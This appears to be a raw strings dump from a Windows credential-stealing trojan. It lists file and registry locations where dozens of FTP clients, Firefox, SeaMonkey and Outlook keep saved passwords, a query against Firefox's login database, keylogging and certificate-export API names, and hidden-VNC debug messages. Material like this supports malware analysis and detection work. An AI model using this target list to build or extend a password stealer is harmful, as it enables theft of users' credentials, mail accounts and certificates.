RushSite.xml

RushSite.xml

\FTPRush

\FTPRush

bitkinex.ds

bitkinex.ds

NDSites.ini

NDSites.ini

Software\LeechFTP

Software\LeechFTP

bookmark.dat

bookmark.dat

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32

sites.db

sites.db

servers.xml

servers.xml

\FTPGetter

\FTPGetter

ESTdb2.dat

ESTdb2.dat

\Estsoft\ALFTP

\Estsoft\ALFTP

QData.dat

QData.dat

SM.arch

SM.arch

FTP .Link\shell\open\command

FTP .Link\shell\open\command

NppFTP.xml

NppFTP.xml

Software\MAS-Soft\FTPInfo\Setup

Software\MAS-Soft\FTPInfo\Setup

ServerList.xml

ServerList.xml

\FTPInfo

\FTPInfo

NovaFTP.db

NovaFTP.db

\INSoftware\NovaFTP

\INSoftware\NovaFTP

\sites.xml

\sites.xml

ftplast.osd

ftplast.osd

\SharedSettings.ccs

\SharedSettings.ccs

\SharedSettings.sqlite

\SharedSettings.sqlite

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.ccs

\SharedSettings_1_0_5.sqlite

\SharedSettings_1_0_5.sqlite

\32BitFtp.ini

\32BitFtp.ini

FTPCON

FTPCON

FTP CONTROL

FTP CONTROL

FTPVoyager.ftp

FTPVoyager.ftp

\RhinoSoft.com

\RhinoSoft.com

FTPVoyager.qc

FTPVoyager.qc

FTPVoyager.Archive

FTPVoyager.Archive

SiteInfo.QFP

SiteInfo.QFP

WinFTP

WinFTP

DeluxeFTP

DeluxeFTP

sites.xml

sites.xml

Staff-FTP

Staff-FTP

sites.ini

sites.ini

FreshFTP

FreshFTP

Software\FlashPeak\BlazeFtp\Settings

Software\FlashPeak\BlazeFtp\Settings

LastPassword

LastPassword

LastPort

LastPort

BlazeFtp

BlazeFtp

site.dat

site.dat

\BlazeFtp

\BlazeFtp

GoFTP

GoFTP

Connections.txt

Connections.txt

3D-FTP

3D-FTP

\3D-FTP

\3D-FTP

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32

EasyFTP

EasyFTP

FTPNow

FTPNow

FTP Now

FTP Now

FTPShell

FTPShell

ftpshell.fsi

ftpshell.fsi

ftpsite.ini

ftpsite.ini

FTPList.db

FTPList.db

My FTP

My FTP

project.ini

project.ini

Mailbox.ini

Mailbox.ini

FTP Navigator

FTP Navigator

FTP Commander

FTP Commander

ftplist.txt

ftplist.txt

Software\Sota\FFFTP

Software\Sota\FFFTP

Software\Sota\FFFTP\Options

Software\Sota\FFFTP\Options

Software\FTPWare\COREFTP\Sites

Software\FTPWare\COREFTP\Sites

FtpPort

FtpPort

Software\Cryer\WebSitePublisher

Software\Cryer\WebSitePublisher

_Password

_Password

Software\NCH Software\ClassicFTP\FTPAccounts

Software\NCH Software\ClassicFTP\FTPAccounts

FtpPassword

FtpPassword

_FtpPassword

_FtpPassword

FtpServer

FtpServer

FtpUserName

FtpUserName

FtpDirectory

FtpDirectory

Software\FTPClient\Sites

Software\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

Software\SoftX.org\FTPClient\Sites

PortNumber

PortNumber

PassWord

PassWord

Software\South River Technologies\WebDrive\Connections

Software\South River Technologies\WebDrive\Connections

Software\LinasFTP\Site Manager

Software\LinasFTP\Site Manager

FTP destination password

FTP destination password

FTP destination server

FTP destination server

FTP destination port

FTP destination port

FTP destination user

FTP destination user

FTP destination catalog

FTP destination catalog

FTP profiles

FTP profiles

Msi.dll

Msi.dll

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

{74FF1730-B1F2-4D88-926B-1568FAE61DB7}

\PocoSystem.ini

\PocoSystem.ini

accounts.ini

accounts.ini

sites.dat

sites.dat

\LeapWare\LeapFTP

\LeapWare\LeapFTP

unleap.exe

unleap.exe

leapftp

leapftp

FtpIniName

FtpIniName

Software\Ghisler\Windows Commander

Software\Ghisler\Windows Commander

wcx_PTF.ini

wcx_PTF.ini

Server.Pass

Server.Pass

Server.Host

Server.Host

Server.User

Server.User

Server.Port

Server.Port

Last Server Pass

Last Server Pass

Last Server Port

Last Server Port

\sitemanager.xml

\sitemanager.xml

\recentservers.xml

\recentservers.xml

\filezilla.xml

\filezilla.xml

"password" : "

"password" : "

"password":"

"password":"

\drives.js

\drives.js

\ExpanDrive\favorites.js

\ExpanDrive\favorites.js

\ExpanDrive\drives.js

\ExpanDrive\drives.js

wiseftpsrvs.ini

wiseftpsrvs.ini

wisePTF.ini

wisePTF.ini

wiseftpsrvs.bin

wiseftpsrvs.bin

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}

FTP Count

FTP Count

FTP File%u

FTP File%u

Robo-FTP

Robo-FTP

SOFTWARE\%s\FTPServers

SOFTWARE\%s\FTPServers

user.config

user.config

.duck

.duck

SiteServer %u\Host

SiteServer %u\Host

SiteServer %u\WebUrl

SiteServer %u\WebUrl

SiteServer %u\Remote Directory

SiteServer %u\Remote Directory

SiteServer %u-User

SiteServer %u-User

SiteServer %u-User PW

SiteServer %u-User PW

SiteServer %u\SFTP

SiteServer %u\SFTP

Keychain

Keychain

Software\Nico Mak Computing\WinZip\FTP

Software\Nico Mak Computing\WinZip\FTP

Password

Password

Software\Far\Plugins\FTP\Hosts

Software\Far\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far2\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far Manager\Plugins\FTP\Hosts

Software\Far\SavedDialogHistory\FTPHost

Software\Far\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far2\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

Software\Far Manager\SavedDialogHistory\FTPHost

\win.ini

\win.ini

WS_FTP

WS_FTP

\Ipswitch\WS_FTP

\Ipswitch\WS_FTP

\GlobalSCAPE\CuteFTP

\GlobalSCAPE\CuteFTP

sm.dat

sm.dat

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Pro

\GlobalSCAPE\CuteFTP Lite

\GlobalSCAPE\CuteFTP Lite

\CuteFTP

\CuteFTP

CUTEFTP

CUTEFTP

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar

\Sites.dat

\Sites.dat

\Quick.dat

\Quick.dat

\History.dat

\History.dat

Software\BPFTP\Bullet Proof FTP\Main

Software\BPFTP\Bullet Proof FTP\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BulletProof Software\BulletProof FTP Client\Main

Software\BPFTP\Bullet Proof FTP\Options

Software\BPFTP\Bullet Proof FTP\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BulletProof Software\BulletProof FTP Client\Options

Software\BPFTP

Software\BPFTP

\SmartFTP

\SmartFTP

Favorites.dat

Favorites.dat

History.dat

History.dat

Software\TurboFTP

Software\TurboFTP

\TurboFTP

\TurboFTP

addrbk.dat

addrbk.dat

quick.dat

quick.dat

Port

Port

Login

Login

PasswordType

PasswordType

profiles.xml

profiles.xml

\FTP Explorer

\FTP Explorer

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224

Software\FTP Explorer\Profiles

Software\FTP Explorer\Profiles

FtpSite.xml

FtpSite.xml

PK11_GetInternalKeySlot

PK11_GetInternalKeySlot

sqlite3.dll

sqlite3.dll

sqlite3_prepare

sqlite3_prepare

sqlite3_step

sqlite3_step

sqlite3_column_bytes

sqlite3_column_bytes

sqlite3_column_blob

sqlite3_column_blob

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins

PTF://

PTF://

signons.sqlite

signons.sqlite

\profiles.ini

\profiles.ini

PathToExe

PathToExe

\Mozilla\Firefox\

\Mozilla\Firefox\

Firefox

Firefox

Software\Mozilla

Software\Mozilla

fireFTPsites.dat

fireFTPsites.dat

\Mozilla\SeaMonkey\

\Mozilla\SeaMonkey\

SeaMonkey

SeaMonkey

\Mozilla\Profiles\

\Mozilla\Profiles\

Mozilla

Mozilla

password 51:b:

password 51:b:

SMTP Email Address

SMTP Email Address

SMTP Server

SMTP Server

SMTP User Name

SMTP User Name

HTTP User

HTTP User

HTTP Server URL

HTTP Server URL

HTTPMail User Name

HTTPMail User Name

HTTPMail Server

HTTPMail Server

SMTP User

SMTP User

POP3 Port

POP3 Port

SMTP Port

SMTP Port

IMAP Port

IMAP Port

POP3 Password2

POP3 Password2

IMAP Password2

IMAP Password2

NNTP Password2

NNTP Password2

HTTPMail Password2

HTTPMail Password2

SMTP Password2

SMTP Password2

POP3 Password

POP3 Password

IMAP Password

IMAP Password

NNTP Password

NNTP Password

HTTPMail Password

HTTPMail Password

SMTP Password

SMTP Password

{X-X-X-XX-XXXXXX}

{X-X-X-XX-XXXXXX}

inetcomm server passwords

inetcomm server passwords

outlook account manager passwords

outlook account manager passwords

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Pstorec.dll

Pstorec.dll

[VNC] EXEC: %s

[VNC] EXEC: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

IE WND [%0.8X] ENABLED: %s VISIBLED: %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s

[VDESK] Read CMD %u[%u]

[VDESK] Read CMD %u[%u]

[VDESK] NOT AUTH CMD %u

[VDESK] NOT AUTH CMD %u

GetAsyncKeyState

GetAsyncKeyState

USER32.DLL

USER32.DLL

GetKeyboardState

GetKeyboardState

GetKeyState

GetKeyState

?WINMM.DLL

?WINMM.DLL

?DSOUND.DLL

?DSOUND.DLL

ZwConnectPort

ZwConnectPort

NTDLL.DLL

NTDLL.DLL

[VNC] PROCESS=%s

[VNC] PROCESS=%s

\explorer.exe

\explorer.exe

[VNC] SearchApp Status = %u

[VNC] SearchApp Status = %u

[VNC] FileName = %s

[VNC] FileName = %s

[VNC] CmdLine = %s

[VNC] CmdLine = %s

[VNC] W64 Redir OLD=%u

[VNC] W64 Redir OLD=%u

[VNC] CreateProcess Status = %u (%u)

[VNC] CreateProcess Status = %u (%u)

SysShadow

SysShadow

Chrome_WidgetWin_1

Chrome_WidgetWin_1

Chrome_WidgetWin_0

Chrome_WidgetWin_0

d3d10_1.dll

d3d10_1.dll

d3d10_1core.dll

d3d10_1core.dll

d3d10.dll

d3d10.dll

d3d10core.dll

d3d10core.dll

d2d1.dll

d2d1.dll

OPENGL32.dll

OPENGL32.dll

d3d9.dll

d3d9.dll

d3d11.dll

d3d11.dll

Dxtrans.dll

Dxtrans.dll

WinExec

WinExec

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

RegCloseKey

RegCloseKey

RegNotifyChangeKeyValue

RegNotifyChangeKeyValue

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

NETAPI32.dll

NETAPI32.dll

SHDeleteKeyA

SHDeleteKeyA

SHLWAPI.dll

SHLWAPI.dll

DeleteUrlCacheEntry

DeleteUrlCacheEntry

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

MSVCRT.dll

MSVCRT.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

AVIFIL32.dll

AVIFIL32.dll

GetWindowsDirectoryW

GetWindowsDirectoryW

CallNamedPipeA

CallNamedPipeA

ConnectNamedPipe

ConnectNamedPipe

CreateNamedPipeW

CreateNamedPipeW

DisconnectNamedPipe

DisconnectNamedPipe

CreateNamedPipeA

CreateNamedPipeA

GetWindowsDirectoryA

GetWindowsDirectoryA

EnumWindows

EnumWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

SetViewportOrgEx

SetViewportOrgEx

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyA

RegCreateKeyExA

RegCreateKeyExA

RegOpenKeyExA

RegOpenKeyExA

CryptImportKey

CryptImportKey

CryptDestroyKey

CryptDestroyKey

RegOpenKeyA

RegOpenKeyA

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

CertOpenSystemStoreA

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertDeleteCertificateFromStore

CertAddCertificateContextToStore

CertAddCertificateContextToStore

CertCloseStore

CertCloseStore

CertEnumCertificatesInStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertDuplicateCertificateContext

PFXExportCertStoreEx

PFXExportCertStoreEx

CRYPT32.dll

CRYPT32.dll

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

FindCloseUrlCache

FindCloseUrlCache

FindNextUrlCacheEntryW

FindNextUrlCacheEntryW

FindFirstUrlCacheEntryW

FindFirstUrlCacheEntryW

COMDLG32.dll

COMDLG32.dll

WININET.DLL

WININET.DLL

{7BD47FDD-1028-4944-A268-024C76A61BA9}

{7BD47FDD-1028-4944-A268-024C76A61BA9}

{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{4E153850-602D-4819-B83D-3CCD0A1E7351}

{4E153850-602D-4819-B83D-3CCD0A1E7351}

{1DB12055-380D-432E-9763-74AF5EF609C7}

{1DB12055-380D-432E-9763-74AF5EF609C7}

{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}

{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}

{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}

{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}

{11166F2F-6DE1-4205-8360-3AB2448931C2}

{11166F2F-6DE1-4205-8360-3AB2448931C2}

{7B4F16B2-1959-4C21-97FE-6A7768C974CF}

{7B4F16B2-1959-4C21-97FE-6A7768C974CF}

{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}

{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}

{77101F80-23B8-43A9-AE7B-5CC95982109D}

{77101F80-23B8-43A9-AE7B-5CC95982109D}

\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}

\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}

D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}

{56E926DB-5D71-499E-8BBB-2E28568040CB}

{56E926DB-5D71-499E-8BBB-2E28568040CB}

U{4E153850-602D-4819-B83D-3CCD0A1E7351}

U{4E153850-602D-4819-B83D-3CCD0A1E7351}

2FFC7DAE-2BDA-4ABF-A443-1DD264C72327

2FFC7DAE-2BDA-4ABF-A443-1DD264C72327

=)=2===~=

=)=2===~=

3 343=3_3

3 343=3_3

= =,=`=}=

= =,=`=}=

echrome.dll

echrome.dll

iexplore.exe

iexplore.exe

chrome.exe

chrome.exe

\System32\KERNEL32.DLL

\System32\KERNEL32.DLL

\System32\kernelbase.dll

\System32\kernelbase.dll

\ThemeApiPort

\ThemeApiPort

%Program Files%\Java\jre6\bin\jqs.exe

%Program Files%\Java\jre6\bin\jqs.exe